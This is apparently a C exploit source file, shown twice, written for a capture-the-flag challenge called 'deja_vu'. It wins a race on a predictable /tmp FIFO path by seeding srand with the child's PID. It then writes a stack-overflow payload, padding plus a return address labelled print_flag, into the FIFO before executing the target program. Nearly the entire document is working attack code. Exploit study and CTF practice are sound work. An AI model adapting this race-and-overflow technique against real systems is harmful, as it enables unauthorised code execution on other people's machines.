disconnect3d/deja_vu_exploit.c

## deja_vu_exploit.c
#include <stdio.h>
#include <stdlib.h>

#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/mman.h>

int* shared;


#define CHARS 62
char fifpath[64] = "/tmp/fam-";
char randchars[CHARS + 1] =
    "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
FILE *fif;

void openfif(char *mode) {
    fif = fopen(fifpath, mode);
    setvbuf(fif, NULL, _IONBF, 0);
}

void closefif() {
    fclose(fif);
    fif = NULL;
}


void setfif(int val) {
    val = val + 1;
    srand(val);
    for (int i = 9; i < 20; i++) {
        fifpath[i] = randchars[rand() % CHARS];
    }
    fifpath[20] = 0;
    printf("created symlink based on srand(%d)\n", val);
    mkfifo(fifpath, 0777);
    *shared = 1;
    openfif("w");
    fprintf(fif, "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa");
    fprintf(fif, "F\x88\x04\x08"); // 0x08048846 aka print_flag
    fprintf(fif, "aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaac\n");
    closefif();
    sleep(2);
    char buf[300];
    openfif("r");
    fgets(buf, 256, fif);
    closefif();
}


int main(int argc, char* argv[], char* const envp[]) {
    shared = mmap(0, 4, PROT_WRITE|PROT_READ, MAP_ANONYMOUS|MAP_SHARED, -1, 0);
    if (shared <= 0) {
        printf("Mmap faild = %d\n", shared);
        return -1;
    }
    *shared = 0;

    int pid = fork();
    // parent
    if (pid > 0) {
        setfif(pid);
        pid_t wpid;
        int status = 0;
        while ((wpid = wait(&status)) > 0);
    }
    // child
    else if (pid == 0) {
        while (*shared == 0);
        execve(argv[1], argv+1, envp);
        printf("Child after execve, should not happen\n");
    }

    // failure
    else {
        printf("Fork failed with %d\n", pid);
        return -1;
    }
}
	#include <stdio.h>
	#include <stdlib.h>

	#include <unistd.h>
	#include <sys/types.h>
	#include <sys/stat.h>
	#include <sys/mman.h>

	int* shared;


	#define CHARS 62
	char fifpath[64] = "/tmp/fam-";
	char randchars[CHARS + 1] =
	"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
	FILE *fif;

	void openfif(char *mode) {
	fif = fopen(fifpath, mode);
	setvbuf(fif, NULL, _IONBF, 0);
	}

	void closefif() {
	fclose(fif);
	fif = NULL;
	}


	void setfif(int val) {
	val = val + 1;
	srand(val);
	for (int i = 9; i < 20; i++) {
	fifpath[i] = randchars[rand() % CHARS];
	}
	fifpath[20] = 0;
	printf("created symlink based on srand(%d)\n", val);
	mkfifo(fifpath, 0777);
	*shared = 1;
	openfif("w");
	fprintf(fif, "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa");
	fprintf(fif, "F\x88\x04\x08"); // 0x08048846 aka print_flag
	fprintf(fif, "aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaac\n");
	closefif();
	sleep(2);
	char buf[300];
	openfif("r");
	fgets(buf, 256, fif);
	closefif();
	}




	int main(int argc, char* argv[], char* const envp[]) {
	shared = mmap(0, 4, PROT_WRITE\|PROT_READ, MAP_ANONYMOUS\|MAP_SHARED, -1, 0);
	if (shared <= 0) {
	printf("Mmap faild = %d\n", shared);
	return -1;
	}
	*shared = 0;

	int pid = fork();
	// parent
	if (pid > 0) {
	setfif(pid);
	pid_t wpid;
	int status = 0;
	while ((wpid = wait(&status)) > 0);
	}
	// child
	else if (pid == 0) {
	while (*shared == 0);
	execve(argv[1], argv+1, envp);
	printf("Child after execve, should not happen\n");
	}

	// failure
	else {
	printf("Fork failed with %d\n", pid);
	return -1;
	}
	}